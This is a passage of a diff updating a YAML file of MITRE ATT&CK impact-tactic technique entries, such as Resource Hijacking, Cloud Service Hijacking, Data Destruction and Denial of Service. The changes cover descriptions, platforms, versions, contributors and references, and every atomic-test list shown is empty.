+      created: '2024-09-25T13:44:35.412Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/002
+        external_id: T1496.002
+      - source_name: Sysdig Proxyjacking
+        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+          Chat. Retrieved July 6, 2023.
+        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+      - source_name: Unit 42 Leaked Environment Variables 2024
+        description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+          Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+          Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+        url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+      - source_name: GoBotKR
+        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1657:
     technique:
-      modified: '2024-04-11T20:22:14.359Z'
+      modified: '2024-10-15T15:58:10.254Z'
       name: Financial Theft
       description: "Adversaries may steal monetary resources from targets through
         extortion, social engineering, technical theft, or other methods aimed at
@@ -58169,7 +59002,7 @@ impact:
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
       - Pawel Partyka, Microsoft Threat Intelligence
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -58179,10 +59012,9 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
@@ -58245,7 +59077,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1491.001:
     technique:
@@ -58286,7 +59117,7 @@ impact:
         messages. Since internally defacing systems exposes an adversary''s presence,
         it often takes place after other intrusion goals have been accomplished.(Citation:
         Novetta Blockbuster Destructive Malware)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-28T18:55:35.988Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Defacement: Internal Defacement'
       x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -58307,9 +59138,157 @@ impact:
       - Integrity
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1491.001
     atomic_tests: []
+  T1496.004:
+    technique:
+      modified: '2024-10-16T17:59:27.535Z'
+      name: Cloud Service Hijacking
+      description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+        applications to complete resource-intensive tasks, which may impact hosted
+        service availability. \n\nFor example, adversaries may leverage email and
+        messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+        Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+        spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+        messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+        2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+        in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+        AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+        2024)\n\nIn some cases, adversaries may leverage services that the victim
+        is already using. In others, particularly when the service is part of a larger
+        cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+        2024) Leveraging SaaS applications may cause the victim to incur significant
+        financial costs, use up service quotas, and otherwise impact availability. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+      created: '2024-09-25T14:05:59.910Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/004
+        external_id: T1496.004
+      - source_name: SentinelLabs SNS Sender 2024
+        description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+          Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+        url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+      - source_name: Lacework LLMJacking 2024
+        description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+          with Composite Alerts. Retrieved September 25, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+      - source_name: Sysdig LLMJacking 2024
+        description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+          (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+      - source_name: Permiso SES Abuse 2023
+        description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+          25, 2024.
+        url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.001:
+    technique:
+      modified: '2024-10-13T16:58:38.820Z'
+      name: Compute Hijacking
+      description: "Adversaries may leverage the compute resources of co-opted systems
+        to complete resource-intensive tasks, which may impact system and/or hosted
+        service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        is to validate transactions of cryptocurrency networks and earn virtual currency.
+        Adversaries may consume enough system resources to negatively impact and/or
+        cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+        Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+        because of the high potential for available resources, but user endpoint systems
+        may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+        environments may also be targeted due to the ease of deployment via exposed
+        APIs and the potential for scaling mining activities by deploying or compromising
+        multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+        Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+        cryptocurrency mining malware identify then kill off processes for competing
+        malware to ensure it’s not competing for resources.(Citation: Trend Micro
+        War of Crypto Miners)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Network Traffic: Network Connection Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Sensor Health: Host Status'
+      - 'Process: Process Creation'
+      - 'File: File Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+      created: '2024-09-25T13:34:30.100Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/001
+        external_id: T1496.001
+      - source_name: Unit 42 Hildegard Malware
+        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+      - source_name: CloudSploit - Unused AWS Regions
+        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+          Retrieved October 8, 2019.
+        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+          17, 2019.
+        url: https://securelist.com/lazarus-under-the-hood/77908/
+      - source_name: Trend Micro Exposed Docker APIs
+        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+          via Exposed APIs. Retrieved April 6, 2021.
+        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+      - source_name: Trend Micro War of Crypto Miners
+        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+          Miners: A Battle for Resources. Retrieved April 6, 2021.'
+        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1565:
     technique:
       modified: '2024-02-02T17:18:39.004Z'
@@ -58362,11 +59341,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1531:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:35:13.577Z'
       name: Account Access Removal
       description: "Adversaries may interrupt availability of system and network resources
         by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -58389,6 +59367,7 @@ impact:
         phase_name: impact
       x_mitre_contributors:
       - Hubert Mank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -58406,9 +59385,10 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      x_mitre_version: '1.2'
+      - IaaS
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -58434,9 +59414,8 @@ impact:
         url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1531
     atomic_tests: []
   T1486:
@@ -58523,7 +59502,7 @@ impact:
         NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
         compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
         Part 1)"
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T13:07:10.318Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data Encrypted for Impact
       x_mitre_detection: |-
@@ -58547,12 +59526,11 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1486
     atomic_tests: []
   T1499:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:56:47.424Z'
       name: Endpoint Denial of Service
       description: |
         Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58571,7 +59549,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Alfredo Oliveira, Trend Micro
       - David Fiser, @anu4is, Trend Micro
@@ -58588,18 +59565,13 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.1'
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -58623,8 +59595,8 @@ impact:
       - source_name: FSISAC FraudNetDoS September 2012
         description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
           Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
       - source_name: ArsTechnica Great Firewall of China
         description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
           on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -58644,33 +59616,22 @@ impact:
         url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1496:
     technique:
-      modified: '2024-02-14T21:00:00.467Z'
+      modified: '2024-10-13T17:00:09.759Z'
       name: Resource Hijacking
       description: "Adversaries may leverage the resources of co-opted systems to
         complete resource-intensive tasks, which may impact system and/or hosted service
-        availability. \n\nOne common purpose for Resource Hijacking is to validate
-        transactions of cryptocurrency networks and earn virtual currency. Adversaries
-        may consume enough system resources to negatively impact and/or cause affected
-        machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
-        Blog 2017) Servers and cloud-based systems are common targets because of the
-        high potential for available resources, but user endpoint systems may also
-        be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
-        CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
-        due to the ease of deployment via exposed APIs and the potential for scaling
-        mining activities by deploying or compromising multiple containers within
-        an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
-        Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
-        malware identify then kill off processes for competing malware to ensure it’s
-        not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
-        may also use malware that leverages a system's network bandwidth as part of
-        a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
-        campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
-        they may engage in proxyjacking by selling use of the victims' network bandwidth
-        and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+        availability. \n\nResource hijacking may take a number of different forms.
+        For example, adversaries may:\n\n* Leverage compute resources in order to
+        mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+        SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+        quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+        types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+        2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58681,7 +59642,7 @@ impact:
       - Magno Logan, @magnologan, Trend Micro
       - Vishwas Manral, McAfee
       - Yossi Weizman, Azure Defender Research Team
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Consider monitoring process resource usage to determine anomalous
         activity associated with malicious hijacking of computer resources such as
@@ -58698,8 +59659,11 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.5'
+      - SaaS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'File: File Creation'
@@ -58718,99 +59682,73 @@ impact:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1496
         external_id: T1496
-      - source_name: Unit 42 Hildegard Malware
-        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
-          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
-        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
-      - source_name: CloudSploit - Unused AWS Regions
-        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
-          Retrieved October 8, 2019.
-        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
-      - source_name: Sysdig Proxyjacking
-        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
-          Chat. Retrieved July 6, 2023.
-        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
-      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
-        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
-          17, 2019.
-        url: https://securelist.com/lazarus-under-the-hood/77908/
-      - source_name: Trend Micro Exposed Docker APIs
-        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
-          via Exposed APIs. Retrieved April 6, 2021.
-        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
-      - source_name: Trend Micro War of Crypto Miners
-        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
-          Miners: A Battle for Resources. Retrieved April 6, 2021.'
-        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
-      - source_name: GoBotKR
-        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
-          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
-        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      - source_name: Sysdig Cryptojacking Proxyjacking 2023
+        description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+          and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1496
     atomic_tests: []
   T1565.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
-      created: '2020-03-02T14:27:00.693Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1565.002
-        url: https://attack.mitre.org/techniques/T1565/002
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
-        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:33:33.983Z'
+      name: Transmitted Data Manipulation
       description: |-
         Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
 
         Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Transmitted Data Manipulation
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
         can be difficult without the appropriate tools. In some cases integrity verification
         checks, such as file hashing, may be used on critical files as they transit
         a network. With some critical processes involving transmission of data, manual
         or out-of-band integrity checking may be useful for identifying manipulated
         data. '
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+      created: '2020-03-02T14:27:00.693Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/002
+        external_id: T1565.002
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1485:
     technique:
-      modified: '2023-10-03T17:30:32.192Z'
+      modified: '2024-09-25T20:46:14.641Z'
       name: Data Destruction
       description: |-
         Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
@@ -58819,7 +59757,7 @@ impact:
 
         To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
 
-        In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
+        In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58845,9 +59783,10 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Deletion'
+      - 'Cloud Storage: Cloud Storage Modification'
       - 'Process: Process Creation'
       - 'File: File Deletion'
       - 'Image: Image Deletion'
@@ -58903,55 +59842,11 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1485
     atomic_tests: []
   T1498:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      - Containers
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Weizman, Azure Defender Research Team
-      - Vishwas Manral, McAfee
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
-      type: attack-pattern
-      created: '2019-04-17T20:23:15.105Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1498
-        url: https://attack.mitre.org/techniques/T1498
-      - source_name: FireEye OpPoisonedHandover February 2016
-        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
-        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
-          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
-          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
-      - source_name: FSISAC FraudNetDoS September 2012
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
-        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
-          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-      - source_name: Symantec DDoS October 2014
-        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
-        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
-          Retrieved April 24, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T16:01:00.510Z'
       name: Network Denial of Service
       description: |-
         Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58966,6 +59861,10 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_contributors:
+      - Yossi Weizman, Azure Defender Research Team
+      - Vishwas Manral, McAfee
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
